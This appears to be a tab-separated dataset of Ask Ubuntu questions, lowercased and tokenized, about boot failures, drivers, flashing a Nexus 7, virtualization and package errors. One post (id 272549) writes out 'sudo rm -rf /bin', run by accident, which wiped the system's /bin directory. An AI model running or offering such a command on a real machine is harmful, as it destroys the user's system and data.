272542	stuck on `` sending 'userdata ' ( 137526 kb ) ... ''	yesterday i installed the developer preview on my nexus 7 , to see how it was ... today , trying to get back to android , i got stuck ( for around 20 minutes now ) on the following : root @ lvandoeduardo : /home/vandoeduardo/downloads/nakasi-jdq39 # ./flash-all.sh ... ( bootloader ) bootloader is already unlocked okay [ 0.020s ] finished . total time : 0.020s erasing 'boot ' ... okay [ 0.027s ] finished . total time : 0.027s ******** did you mean to fastboot format this partition ? erasing 'cache ' ... okay [ 0.077s ] finished . total time : 0.077s erasing 'recovery ' ... okay [ 0.028s ] finished . total time : 0.028s ******** did you mean to fastboot format this partition ? erasing 'system ' ... okay [ 0.066s ] finished . total time : 0.066s ******** did you mean to fastboot format this partition ? erasing 'userdata ' ... okay [ 1.206s ] finished . total time : 1.206s sending 'bootloader ' ( 2096 kb ) ... okay [ 0.264s ] writing 'bootloader ' ... okay [ 0.724s ] finished . total time : 0.989s rebooting into bootloader ... okay [ 0.020s ] finished . total time : 0.020s archive does not contain 'boot.sig' archive does not contain 'recovery.sig' archive does not contain 'system.sig' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- bootloader version ... : 4.18 baseband version ... .. : n/a serial number ... ... .. : 015d24bc7c4bf818 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- checking product ... okay [ 0.040s ] checking version-bootloader ... okay [ 0.023s ] sending 'boot ' ( 4944 kb ) ... okay [ 0.635s ] writing 'boot ' ... okay [ 0.174s ] sending 'recovery ' ( 5446 kb ) ... okay [ 0.663s ] writing 'recovery ' ... okay [ 0.197s ] erasing 'system ' ... okay [ 0.054s ] sending 'system ' ( 471804 kb ) ... okay [ 55.425s ] writing 'system ' ... okay [ 23.372s ] erasing 'userdata ' ... okay [ 1.027s ] formatting 'userdata ' partition ... creating filesystem with parameters : size : 14442037248 block size : 4096 blocks per group : 32768 inodes per group : 8176 inode size : 256 journal blocks : 32768 label : blocks : 3525888 block groups : 108 reserved block group size : 863 created filesystem with 11/883008 inodes and 96825/3525888 blocks sending 'userdata ' ( 137526 kb ) ... it just does n't gets through it ... what can i do ? thanks in advance !
272545	how to un-install ubuntu ?	i have 3 partitions . one for windows 7 , one for ubuntu and one for my files . so , how do i go about un-installing ubuntu ? i did not install it using wubi .
272547	config problems in sendmail	i am in the last step of the send mail config , due to some issues the send mail in /usr/sbin/ is not getting accessed even though i gave permissions . i have to perform the following step /usr/sbin/sendmail myemail @ domain.com < `` my test email being sent from sendmail ''
272549	deleted /bin instead of /android-project/bin	an android project has its /bin directory and what i wanted to do is to deleted this . what i actually mean is delete /path/to/android-project/bin not the /bin directory . so i executed this command , path/to/android-project $ sudo rm -rf /bin now , the entire /bin directory is deleted . i wanted to try restoring it in by using terminal but i cant launch the terminal since there are files in /bin related to terminal that have been deleted ( my guess ) . are there any ways to restore /bin directory ? i 'm looking into upgrading ubuntu .
272551	problem regarding packages installation in ubuntu	i am new to ubuntu and cant find a solution to my simple question `` do the new installation affects the installation of previously installed packages ? '' . can anybody solve my query or suggest me a suitable manual to clear my doubts . please solve my query .
272558	no more unity after amd graphics driver	i seem to have a problem . i am running ubuntu 12.04 ( 64 bit ) on my hp probook 4530s ( i5-core , 8gb , ati radeon hd6790 ) and i had some heating problems . i 've managed to install the graphics driver from the website using this method : what is the correct way to install ati catalyst video drivers ( fglrx ) ? all seems well , but when i switch to graphics mode to use the low power intel onboard graphics card and i restart there are no more unity elements - the upper menu bar , the dock on the left and when i managed to open a window ( right click on the desktop ) there are no longer the close , minimize , maximize buttons . did n't anyone else encounter this problem ?
272562	screen resolution issues with ubuntu 12.10	when i boot into the ubuntu system then there is no problem until i press the login button . as soon as i do that then the screen starts flickering and using ubuntu becomes impossible unless i go to the system settings pane and reduce the screen resolution . but once i reboot then this problem comes up again and i need the resolution to be the same . there is an option for the default screen resolution in linux mint 14 but not so in ubuntu or at least i do n't know about it . specs ubuntu 12.10 dual boot with windows xp 2 gb ram 320 gb harddrive with 34 gb partition for ubuntu monitor analog , rez : 1280 by 1024 please help me with the solution to this .
272563	how do i make the usb monitor lenovo think vision lt1421 work ?	how to make usb monitor lenovo think vision lt1421 work on ubuntu . on official site i see drivers only for windows . when i plug it in : it is not detected . on windows it worked fine .
272565	how can i get a package update in the repositories ?	i use a software ( anki ) which is in version 0.9.9.8.6-2.1 in the debian repository and in version 1.2.11-1 in the ubuntu repository . quite a lot has changed meanwhile ( changelog ) . the latest version is 2.0.8 . source code and a debian package is already available ( see downloads ) , but it is not in the repository . question 1 : where or who can i ask to update this package ? question 2 : when it gets updated in the debian repository , will it automatically get updated in the ubuntu repository ?
272566	wmctrl ignore other workspaces	my question is very similar to make wmctrl ignore other-than-current workspace 's windows . the fact is i use xfce so wmctrl actually sees more desktops . petr @ sova : ~ $ wmctrl -d 0 * dg : 1600x900 vp : 0,0 wa : 62,21 1538x879 1 1 - dg : 1600x900 vp : n/a wa : 62,21 1538x879 2 2 - dg : 1600x900 vp : n/a wa : 62,21 1538x879 3 3 - dg : 1600x900 vp : n/a wa : 62,21 1538x879 4 4 - dg : 1600x900 vp : n/a wa : 62,21 1538x879 5 5 - dg : 1600x900 vp : n/a wa : 62,21 1538x879 6 6 - dg : 1600x900 vp : n/a wa : 62,21 1538x879 7 7 - dg : 1600x900 vp : n/a wa : 62,21 1538x879 8 8 - dg : 1600x900 vp : n/a wa : 62,21 1538x879 9 i have tons of shortcuts like this one : wmctrl -xa chromium || chromium-browser how can i have wmctrl only search the current workspace ? i am open to wrapping wmctrl in a custom command .
272570	unable to install ubuntu on lenovo y500	i am totally unable to install any flavor of linux on my lenovo y500 . tl ; dr : with efi on - > can not even access installer with legacy - > installer runs fine , but installed os never boots long version : it is going to be hard to recap what i did , because i tried so many things , but here is the gist of it : efi mode ( secure boot disabled ) : trial # 1 ubuntu 12.10 x64 & mint 14 x64 boot from usb see screen with choices pick `` try ubuntu '' get black screen trial # 2 ubuntu 12.10 x64 & mint 14 x64 boot from usb see screen with choices press `` e '' to enter edit mode remove `` quiet splash '' replace with `` nomodeset '' end up on the command line with an error message from x server : `` no screen found '' try fiddling around with xorg.conf to no avail trial # 3 arch linux live usb efi mode no boot trial # 4 ubuntu 12.10 x64 & mint 14 x64 set `` e '' to enter edit mode in menu add acpi=off end up with `` ( initramfs ) unable to find a medium '' message trial # 5 same as above set sata mode to legacy ( it was ahci ) error loop that says something along the lines of `` ata1.00 : hard resetting link '' legacy mode trial # 1 ubuntu 12.10 x64 & mint 14 x64 usb boot everything seems to work proceed to normal install ( picks ssd drive by default ) everything seems to work reboot blank screen reboot with `` shift '' pressed see message `` grub loading . '' and nothing as per advised on ubuntu 's community efi page , run boot-repair same results run boot-repair again same results trial # 2 ubuntu 12.10 x64 & mint 14 x64 same as above , but pick 1t hdd as target install same results trial # 3 create a /boot partition on the ssd install on ssd same results ( `` grub loading . '' ) run boot repair twice same results trial # 4 create a gpt filesystem on hdd create a /boot partition on the hdd install on hdd same results as above trial # 5 install ubuntu on hdd install boot on all drives ( hdd & ssd ) same results trials # 6 install arch on ssd no boot loader found notes : every step has been tried with multiple usbs . all isos ' md5sums have been verified liveusbs have been created both through ubuntu 's embedded app and unetbootin ( save for arch 's live usb which was created by dding the iso as per advised in the arch wiki ) i have wiped out windows in my first trials , and i do n't care , i am never going to use it . i do n't want to dual-boot . i just want ubuntu or mint or arch as far as i can remember ( it gets hard after 50+ trials ) , i tried every option with sata mode ide or normal . not sure though . i 've also tried numerous other things that i ca n't recall right now . all in all i 've been giving this 3 to 5 hours a day for a week and a half to absolutely no avail . i am extremely disappointed as this is my first lenovo and word is lenovo is linux-friendly ... i have never spent more than an hour installing linux on any machine . what 's even more frustrating is that it seems to be working for some people , and i ca n't find any hint telling me how they managed . i wrote to one guy who posted a serie of youtube videos about how to get everything working perfectly on the y500 , and he told me he just installed mint without any problems . might be i am a particular case because i have the sli version of the y500 . if anyone has pointers , incomplete solutions , ideas , black magic , i 'll be forever in debt . thank you p.s : this question , afaik , is not a duplicate of an existing question . i 've scoured all questions containing `` lenovo '' and `` install '' , and none applies to me .
272579	how does squid-deb-proxy handle older/newer versions of ubuntu ?	i followed jorge castro thread here and its working without a problem ! on 12.04-2 x64 bit . however i have a question : if there is an old/newer version client of ubuntu . how does it fetch cached updates ?
272582	how can i install windows 8 while dual-booting ubuntu ?	i have a new dell laptop which has inbuilt ubuntu os in it , i would like to install windows 8 alongside ubuntu , that is , without removing ubuntu .
272587	how to delete sensitive data on android phone ?	i want to sell an old android phone . how can i delete sensitive data on my android phone with a microsd card from within ubuntu , in a secure manner ?
272590	dash board problem	please see the image here i know this is a ridiculous question but t got problem with my dash board , it was like this when i restart my computer to install drive
272597	ubuntu 12.10 does n't load after grub	i recently installed ubuntu 12.10 on my lenovo thinkpad sl-510 . the computer has been working for several weeks now with no problems . today when i turned the computer on i got a blank purple screen . turning it on again ( after a forced shutdown ) i get to the grub screen . selecting ubuntu results in the following : mount : mounting /dev/mapper/ubuntu-root on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . busybox v1.19.3 ( ubuntu 1:1.19.3-7ubuntu1.1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) i ran the memory test from grub and it returned no errors , but i still get this message when trying to load ubuntu .
272605	how to install emmet with gedit text editor in ubuntu 12.04 ?	i am using ubuntu 12.04 . i came to know about emmet plugin . which is really awesome for writing markups . as i am a developer i am using gedit with zencoding plugin to write markup easily . now as i heared about emmet , i want to use it . but can someone kindly tell me how can i make it install with gedit and use it ?
272608	ubuntu os selection screen	after i installed ubuntu 12.04 as a dual boot with windows 7 from usb ( not from wubi.exe ) whenever i boot my system i was taken to the ubuntu os selection screen which shows ( selection for ubuntu generic , ubuntu generic recovery , windows loader , memory test etc ) . i need to change it to windows os selection screen which shows only two options to select from ( windows 7 and ubuntu ) . any way to change it ? ? ?
272609	can i easily migrate a working root system from non-lvm partitions to lvm partitions ?	i am running an ubuntu 12.04 system with a lot of modifications on a system with two ( identical ) harddisks . at the moment those are not running any lvm partitions . i would like to start using lvm , but do n't want to run the risk of a lot of down time if anything goes wrong . most of the how-tos i see talk about setting up a new system . i was wondering if it would be easily possible to set up lvm on the second disk ( i can easily clear the entire disk for this purpose ) and then migrate the system to that disk , freeing the first disk up to also be set up for lvm . is that at all possible ?
272613	is there a virtual machine with direct access to cpu and gpu for gaming ?	sorry for the long question . with the coming of steam for linux i may have been over optimistic and got rid of windows installation . the problem is that i have about 100 steam games that are not ( and may never be ) ported to linux . anyway i got tired of dual boot , and wine solutions ( wineprefix and playonlinux ) do n't always work . so i was wondering if there is any solution to use a virtual machine ( or something similar ) with direct access to hardware spec in order to run windows games in it . ( something like what parallels do on mac ) . re-installing windows is not a huge problem but i was hoping to avoid it as i would like use ubuntu as my everyday os together with more `` difficult '' distros..to learn more about linux . edit : thanks for all your answers : i 'll think about the solution you proposed . honestly to this day i never heard of xen , so i 'll have to read about it ... and maybe buy a new graphic card ... and a new monitor . i think i 'll end up re-installing windows on one of my drives ... it 's a pity though . thanks again .
272617	issue with intel 915gm/gms/910gml express graphics controller drivers	i am new to linux os . i have installed ubuntu 12.04 on hp compaq nc6120 laptop and i have an issue with intel 915gm/gms/910gml express graphics controller driver . it is shown as unknown and i think this is what causes performance issues . $ lspci -nnk | grep -ia2 vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 915gm/gms/910gml express graphics controller [ 8086:2592 ] ( rev 03 ) subsystem : hewlett-packard company nx6110/nc6120 [ 103c:099c ] kernel driver in use : i915 what should i do to fix the performance issues ?
272618	how to install kubuntu on other hard disk	i would like to install kubuntu 12.10 on my computer . i have 2 hard drives , 500 gb each . i have windows 7 home premium installed on one disk , and i want to install kubuntu 12.10 on the other . how do i do this ?
272623	can ls -l be made to separate fields with tabs rather than spaces to make the output useful in a spreadsheet ?	how can the output of ls -l be modified to separate fields using tabs instead of spaces ? i want to paste the output into a spreadsheet ; the padding with a variable number of spaces makes it difficult to do so . to illustrate : drwxr-xr-x 2 root root 4096 sep 26 11:43 wpa_supplicant -rw-r -- -- - 1 root dialout 66 sep 26 11:43 wvdial.conf drwxr-xr-x 9 root root 4096 oct 8 08:21 x11 drwxr-xr-x 12 root root 4096 feb 18 23:31 xdg drwxr-xr-x 2 root root 4096 jan 31 06:11 xml drwxr-xr-x 2 root root 4096 nov 22 07:26 xul-ext -rw-r -- r -- 1 root root 349 jan 13 2012 zsh_command_not_found in the excerpt from ls -l /etc shown above , rows 1 , 2 and 3 have a single digit in column 2 whereas row 4 has two . that means the alignment is achieved by using two spaces for separating columns 1 and 2 in rows 1-3 , but just one space in row 4 .
272624	when startup dell vostro 2520 ubuntu 12.04 , directly goes to gnu brub screen	my laptop is dell vostro 2520 ubuntu with pre-installed 12.04 , when i push power button , it directly goes to gnu brub scree `` gnu grub version 1.99-21ubuntu3.9 '' , and there are some options : ubuntu with linux 3.2.0-38-generic | ubuntu with linux 3.2.0-38-generic ( recovery mode ) | ... .| restore ubuntu 12.04 to factory state . i choosed option : `` ubuntu with linux 3.2.0-38-generic '' , grub > boot , result shows `` no loaded kernel '' , i also tried option : `` ubuntu with linux 3.2.0-38-generic ( recovery mode ) '' , grub > boot , result shows `` no loaded kernel '' ; i did n't try option : `` restore ubuntu 12.04 to factory state '' , because i do n't want to loose my data , also i do n't have a reboot dvd , i also did `` giagnositcs '' , all devices including harddrive 0 & memroy passed the tests . so how can reboot my laptop ?
272629	how to establish vpn connection using vodafone k3773 hspa usb stick ?	i am using ubuntu 12.04 desktop . i am trying to establish vpn pptp connection to ubuntu 12.04 server . vpn connection available when pc is connected to lan - > adsl modem - > internet - > vpn server . no vpn connection available when using 3g modem vodafone k3773 hspa usb stick - > internet - > vpn server . internet is connected . vpn is not . how to establish the vpn connection ? server side log : gre : bad checksum from pppd .
272633	can anyone point me to a guide for installing ubuntu 12.04 lts on to a usb thumb drive ?	i am currently looking to change my home nas from freenas to ubuntu server 12.04 lts . i have had a look but all the guides i can find are about making a live usb not a usb with the full install on it . does anyone know of an easy to follow guides out there for ; making a `` full install '' for ubuntu server 12.04 to a usb thumb drive using a windows 7 . installing the necessary packets to make ubuntu work as a nas setting up a raidz zfs pool . installing samba and setting up a share with a password ? post was edited to clarify what i was after .
272637	i have a problem when using `` export '' command	when i put sudo `` export proxy_local_net_ip=10.113.35.108 '' i get the following error : sudo : export : command not found what should i do to resolve this problem ?
272638	how to install insync-beta-xfce , the google drive client for xfce ( thunarx-python missing ) ?	there are different types of insync available for ubuntu ( see here ) . i am trying to use it under xfce , so the first choice would be to install the xfce version . but i get this error : how to solve this ? installing the generic version works , but it also installs automatically nautilus , which in xfce starts taking over actions that otherwise should be reserved for thunar . ( i do not like to use nautilus in xfce - more here . ) i guess that is why an xfce version exists in the first place . but i can not find how to install thunarx-python .
272639	some man pages not found	ubuntu 12.04 ... i had fedora a couple of years back and i saw the man pages for the following there ... unistd.h sys/types.h standard typedefs ( suffixed by `` _t '' ) etc i tried this ... man unistd but it did n't find it : ( i think those pages are not there in ubuntu although man stdio works . so if ubuntu does n't have 'em please tell me how to download them and what is the command for viewing standard typedef man page ie man page for size_t , pid_t , off_t , clock_t etc . i trid man stddef but not found ...
272641	touchpad gesture available in unity ?	by default , my touchpad support two finger scrolling , two finger tap to double click , and single tap on upper right corner of touchpad to middle click ( which is annoying , accidentally do middle click most of the time ) . can i change the middle click to three finger tap and get pinch to zoom my touchpad ? i have standard synaptic touchpad , fully supported and all gesture are available on windows with synaptic touchpad driver . i do n't want easystroke , i need to configure tap , not stroke , and easystroke does n't work anyway , i can record stroke , but never be able to draw the stroke to run my preferred action .
272647	xfce forgets desktop icons positions	sometimes , after logging out and in , xubuntu forgets the positions of the desktop icons and re-arranges them on top-left as default . i have tried a proposed solution on a similar subject . this locks the icons that were on desktop when i ran the command but not the newer icons . what could i do to permanently fix this issue ? i use xubuntu 12.10 with xfce 4.12 .
272650	trying to get 2560x1440 resolution	1i have this motherboard and this monitor . it is supposed i could get 2560x1440 resolution using hdmi 1.4 , but i do n't know how.. note 1 : i have a hdmi cable and a dvi-hdmi adapter , i do n't know if they support hdmi 1.4 or not..how can i know it ? is maybe that the problem ? any help ? ubuntu 12.10 edit after hennes ' comment and answer : i have just bought a hdmi to dvi-d ( dual link ) , and have run this : xrandr | grep maximum & sleep 2 gtf 2560 1440 60.0 & sleep 2 xrandr -- newmode `` 2560x1440_60.00 '' 311.83 2560 2744 3024 3488 1440 1441 1444 1490 -hsync +vsync & sleep 2 xrandr -- addmode hdmi2 2560x1440_60.00 & sleep 2 xrandr -- output hdmi2 -- mode 2560x1440_60.00 & exit 0 then i get 2560x1440 but i get this output and everything is pixelated like in the image of the first question of this thread : screen 0 : minimum 320 x 200 , current 2560 x 1440 , maximum 8192 x 8192 # 2560x1440 @ 60.00 hz ( gtf ) hsync : 89.40 khz ; pclk : 311.83 mhz modeline `` 2560x1440_60.00 '' 311.83 2560 2744 3024 3488 1440 1441 1444 1490 -hsync +vsync x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 38 current serial number in output stream : 38 note 1 : the last five lines are not shown if i run the script in default ubuntu desktop environment instead of on xfce . note 2 : the display manager tag my monitor as `` samsung electric company 24 '' instead of 27 . javi
272653	ubuntu on hybrid gpu laptops	i am running ubuntu on vaio vpcse ( 23fx ) that contains hybrid graphics processing capabilities . it is equipped with : vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) vga compatible controller : advanced micro devices [ amd ] nee ati caicos [ radeon hd 6400m/7400m series ] the laptop has a speed/stamina selector switch to make changeover between the gpus . my queries are : how to know which gpu is currently working ? whether a speed/stamina selector switch is functional in ubuntu ? making it functional if not . what are the good drivers ( propriety or open ) to install , to get good usability ?
272654	how to install ubuntu 12.04 with win7 dual-boot	i had been using ubuntu for a little while now and i must say very nice a few hardware compatibility issues but that 's not why i am here . i have recently uninstalled ubuntu because i did not feel safe having both os able to access data from the same drive i would like to install ubuntu on one partition so that its data is kept with that os on its own partition separate from windows . how can i do this from windows 7 ? i am using a live cd for installation of ubuntu . if i am unclear please do say so : ) edit : hdd status at the moment is windows c : \ and system e : \ both partitions i believe used for my win 7 . hdd is 500gb in total .
272655	two drivers for same device in ubuntu	i am a beginner . is it possible to have two drivers for same device in ubuntu ? example : two drivers for one graphic card . thanks
272664	how do i set up internet connection in virtualbox ?	this question is not duplicate of this , because in my case , internet connection does n't work on any version of ubuntu as host ( 11.04 , 12.04 , .12.10 ) , and the solution is different too , mine needed virtualbox and extension pack from official website , not from usc , and it solved the problem . here is the question : i downloaded virtualbox from ubuntu software center and had installed lubuntu and windows xp inside virtualbox . both are connected via nat , i have tried other options too , but none of them works . how do i share internet from host os to guest os ? i 'm using usb modem mobile broadband connection on host os ( ubuntu quantal ) . i have read no internet connectivity in virtual-box with both host and virtual os being 12.04 , but still i do n't know what to do . can you give me step-by-step solution ?
272666	how to create package download script with correct dependencies ?	in synaptic it 's possible to select a bunch of packages for installation ( or reinstallation ) , then just click file â generate package download script to get a set of commands to download the corresponding deb files . this is useful for transferring missing packages to an offline system for installation , and it also resolves dependencies . unfortunately , as far as i can tell the process has some drawbacks : the online system has no way of knowing which of the dependencies are installed on the offline system ( unless they 're both somehow in sync ) . in the worst case this means several roundtrips to download all the necessary files . synaptic is not installed by default on a new system , so i 'd have to use two roundtrips if i wanted to generate the package download script on the offline system - once for the synaptic deb file , and again with the files downloaded by the generated script . apt-get download is not an alternative since it does n't resolve dependencies . is there some way to generate a package download script with the packages available on the ubuntu live cd , or transfer the packaging state on the offline machine to the online one and create a package download script with the latest upstream state ? the latter option would be preferred since it would also get the latest versions of each package .
272667	need to set up for music production and audio recording	i want to record , mix , and master audio ( music , skits ) i need to know what are good settings and programs on unbuntu for this . while i will use it too update and whatnot , i will disconect from the internet soon , so if you could please let me know . thank you
272668	unable to update because of bind issue on ubuntu 12.04 lts	how can i completly uninstall bind 9 on ubuntu . its causing issues with keeping the server up to date as shown . **root @ cp11 : ~ # apt-get upgrade** reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : bind9 : depends : libbind9-80 ( = 1:9.8.1.dfsg.p1-4ubuntu0.2 ) but 1:9.8.1.dfsg.p1-4ubuntu0.5 is installed depends : libdns81 ( = 1:9.8.1.dfsg.p1-4ubuntu0.2 ) but 1:9.8.1.dfsg.p1-4ubuntu0.5 is installed depends : libisc83 ( = 1:9.8.1.dfsg.p1-4ubuntu0.2 ) but 1:9.8.1.dfsg.p1-4ubuntu0.5 is installed depends : libisccc80 ( = 1:9.8.1.dfsg.p1-4ubuntu0.2 ) but 1:9.8.1.dfsg.p1-4ubuntu0.5 is installed depends : libisccfg82 ( = 1:9.8.1.dfsg.p1-4ubuntu0.2 ) but 1:9.8.1.dfsg.p1-4ubuntu0.5 is installed depends : liblwres80 ( = 1:9.8.1.dfsg.p1-4ubuntu0.2 ) but 1:9.8.1.dfsg.p1-4ubuntu0.5 is installed depends : bind9utils ( = 1:9.8.1.dfsg.p1-4ubuntu0.2 ) but 1:9.8.1.dfsg.p1-4ubuntu0.5 is installed e : unmet dependencies . try using -f. root @ cp11 : ~ # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : bind9 suggested packages : bind9-doc the following packages will be upgraded : bind9 1 upgraded , 0 newly installed , 0 to remove and 196 not upgraded . 1 not fully installed or removed . need to get 0 b/343 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of bind9 : bind9 depends on libbind9-80 ( = 1:9.8.1.dfsg.p1-4ubuntu0.2 ) ; however : version of libbind9-80 on system is 1:9.8.1.dfsg.p1-4ubuntu0.5 . bind9 depends on libdns81 ( = 1:9.8.1.dfsg.p1-4ubuntu0.2 ) ; however : version of libdns81 on system is 1:9.8.1.dfsg.p1-4ubuntu0.5 . bind9 depends on libisc83 ( = 1:9.8.1.dfsg.p1-4ubuntu0.2 ) ; however : version of libisc83 on system is 1:9.8.1.dfsg.p1-4ubuntu0.5 . bind9 depends on libisccc80 ( = 1:9.8.1.dfsg.p1-4ubuntu0.2 ) ; however : version of libisccc80 on system is 1:9.8.1.dfsg.p1-4ubuntu0.5 . bind9 depends on libisccfg82 ( = 1:9.8.1.dfsg.p1-4ubuntu0.2 ) ; however : version of libisccfg82 on system is 1:9.8.1.dfsg.p1-4ubuntu0.5 . bind9 depends on liblwres80 ( = 1:9.8.1.dfsg.p1-4ubuntu0.2 ) ; however : version of liblwres80 on system is 1:9.8.1.dfsg.p1-4ubuntu0.5 . bind9 depends on bind9utils ( = 1:9.8.1.dfsg.p1-4ubuntu0.2 ) ; however : version of bind9utils on system is 1:9.8.1.dfsg.p1-4ubuntu0.5 . dpkg : error processing bind9 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : bind9 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
272670	sensors ( 1 ) prints only gpu temperature	that 's output of sensors $ sensors nouveau-pci-0100 adapter : pci adapter temp1 : +59.0째c ( high = +100.0째c , crit = +110.0째c ) i 'm worried if this is really gpu temperature ? how to obtain cpu temperature ? are there coolers providing such info ?
272673	how to properly update grub in hosted environment	i 'm hoping to obtain some guidance to properly update grub on a godaddy dedicated server , as my previous attempt has resulted in re-provisioning the server . if this were a local server , i think i could start the server from the console and make the necessary configuration changes . being hosted , i do n't have access to the console - or so i believe , so i 'm stuck with a server i can no longer access . to start , i 'm using apt-get upgrade ( as i 'm ultimately trying to upgrade from lucid to precise ) . this then identifies the grub update.. there are two separate prompts which i 'm unsure how to properly proceed : 1 ) grub configuration the update asks what i want to do with the config file ( /etc/default/grub ? ) . should i keep my existing replace with package merge existing with package other 2 ) installation location a second prompt is to install the boot loader . the guide suggests that if i do n't know , i should install it to all locations . /boot is located on /dev/sda1 /dev/sda3 contains everything else ( eg / ) is /boot the only place it needs to be located , or do i need to identify something in /boot/grub/grub.cfg to identify where it should be installed ?
272675	how can i make squid-deb-proxy work with proxy authentication ?	i have squid-deb-proxy working fine without a problem without apt proxy authentication . however when i add a proxy file to /etc/apt/apt.conf.d and put in my proxy authentication inside this file . running sudo apt-get update does not work it misses the update and ignores . however when i move out or comment the file that squid-deb-proxy-client created inside /etc/apt/apt.conf.d which is 30autoproxy and contains 1 line pointing to /usr/share/squid-deb-proxy-client/apt-avahi-discover the apt-get update works without a problem . note that observing the logs of /var/log/squid-deb-proxy/access.log does not log any successful entry . going without proxy logs successful entries and apt-get update works . so bottom line how to make squid-deb-proxy-client on the main ubuntu machine to work thru proxy that has authentication .
272676	do x-server/x-org come with the kernel ?	do x-server/x-org come with the kernel itself or are they separate packages that are installed in distributions ? what is difference between xorg and xserver ?
272678	intel centrino wireless-n 2230 connectivity and performance problems with ubuntu 12.10	i have bought a new lenovo edge e330 notebook with an intel centrino wireless-n 2230 network card . currently , i am having some connectivity problems with kubuntu 12.10 . the card succeeds in finding available networks , but it seems to be not possible to connect to them . i have loaded the driver using : modprobe iwlwifi 11n_disable=1 sometimes , a connection is established but in this rare cases the speed is quite low . this performance problem seems not to occur with windows 8 ( where i also had to disable the n mode ) . having tried module backports from kernel 3.6 did unfortunately not help . what could be the source of the problem ?
272683	how can the username be removed from the lock screen ?	when the lock screen is active ( it can e.g . be activated with ctrl+alt+l ) the username is shown . how can i remove the username from the lock screen ? i want the lock screen to simply not display the username .
272685	/etc/init.d/gdm command not found	am trying to install the nvidia driver but it keeps givin me close the x server.. i tried the usual way.. to kill the gnome manager.. did n't work because of an error : s sudo /etc/init.d/gdm stop // error here sudo chmod +x nvidia-linux-x86-185.18.36-pkg1.run sudo ./nvidia-linux-x86-185.18.36-pkg1.run tried to run it in the recovery mode.. but the x server is not shuttin : s what should i do now : ?
272686	ubuntu taking very long time to boot	so i 've insalled ubuntu 12.10 from a usb stick alongside with windows . when i boot ubuntu , it spends about 10 minutes in a purple screen , no cursor , no nothing , then it goes to a black screen but with a cursor , and lastly the login screen , which stays frozen for like 10 minutes . after i login , the screen stays frozen on an empty wallpaper for 10 minutes aswell . finally after ubuntu boots , everything runs ultra slowly . firefox takes a few minutes to launch and freezes every like 10 seconds . ive got an intel pentium 2.93 ghz dual core processor , 4 gigs of ram , geforce gts250 .
272691	installing clamav and clamtk	my computer experience dates from 1961 but i am an ubuntu/linux rookie . i am accustomed to downloading software , saving it , and merely clicking on it and voila it is installed . i have downloaaded clamav and clamtk . i just noticed the surceforge similar question and shall check it out , but to be on the safeside have my back with another source for installation by the numbers installation . incidentally naturally i 'm a dos/windows guy and struggle with much of the linux/ubuntu terminology so any references or other help on this would also be appreciated .
272694	virtualization on ubuntu 12.04 lts	we plan to introduce virtualization on our 64bit ubuntu 12.04 lts server so that we can run , in different vms , a file server for our staff and some development machines for our it team ( code repository , continuous integration , vms with different browsers/os 's for testing webapps , etc. ) . we would like to find a virtualization solution that provides : snapshots : ability to revert to a previous state of the machine ( useful before installing a system update , etc . ) ; hot backups : ability to create a copy of a machine for safety purposes ; easy of use : simple user interface to create snapshots , create/start/stop/delete vms . which virtualisation solution ( e.g. , kvm , virtualbox , xen , xen/xcp , etc . ) would you recommend for such a setup ?
272698	what 's the point of dnsmasq in networkmanager ?	i very recently came to realize that the caching is disabled by default on the dnsmasq that is integrated with networkmanager . in my mind , that defeats the point and makes dnsmasq a redundant layer in name resolution . obviously , i must be missing something - what is the purpose of dnsmasq in nm ?
272699	is there any way to automatically download torrents ?	i want to be able to set up downloads of weekly tv shows so the .torrent is automatically downloaded to my computer , ie . i just tell the program that i want ( for example ) adventure time to download as soon as it is available , and it takes care of the rest . a quick google search showed me that ted was an option for ubuntu , but the website seems to have disappeared . does anybody know of a way to do this ?
272702	designing ui using html and css and without webkit ?	i want to try out developing desktop applications with the ui designed using html5 , css and jquery and the back end code written in python . is this possible ? i have already tried out the webkit but is there any other way ? if it is possible can you point me to a good tutorial ?
272704	permissions depending on parameters passed to application	i have a java app that writes to a very important table i have . this is sudo protected , but this app takes a parameters for where the output should go . the default is the real deal but the `` output '' parameter takes priority over the default , so if a user provides a path that they have write permission for , say : /home/username/mystuff then i would like for users to be allowed to write to these directories . the app is launched in a shell script , so i am wondering if i can check that the string does not equal /path/to/real/deal and not empty ( since /path/to/real/deal is the default ) and allow users to write to places they have permissions for . my impression of linux permissions is that it is tied to the application itself and can not be conditionally approved , but i wonder if there is some bash fu or alternative method i can perform to get me my desired result . using ubuntu 10.04.4 lts
272707	how to install emacs-snapshot under 13.04 ( raring ) ?	i added deb http : //ppa.launchpad.net/cassou/emacs/ubuntu raring main deb-src ... raring main to /etc/apt/sources.list and did sudo add-apt-repository , sudo apt-get update , and sudo apt-get install emacs-snapshot-el emacs-snapshot-gtk emacs-snapshot to install emacs snapshot under 13.04 . i obtained failed to fetch and other errors , probably due to emacs-snapshot not being available for 13.04 ( yet ) . i then added the above lines in /etc/apt/sources.list also for quantal in the hope that would work to install emacs snapshot under 13.04 . although this looks less hopeless , i obtained : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : emacs-snapshot : depends : emacs-snapshot-bin-common ( = 2:20130317-1~ppa1~quantal1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . how can i solve this ?
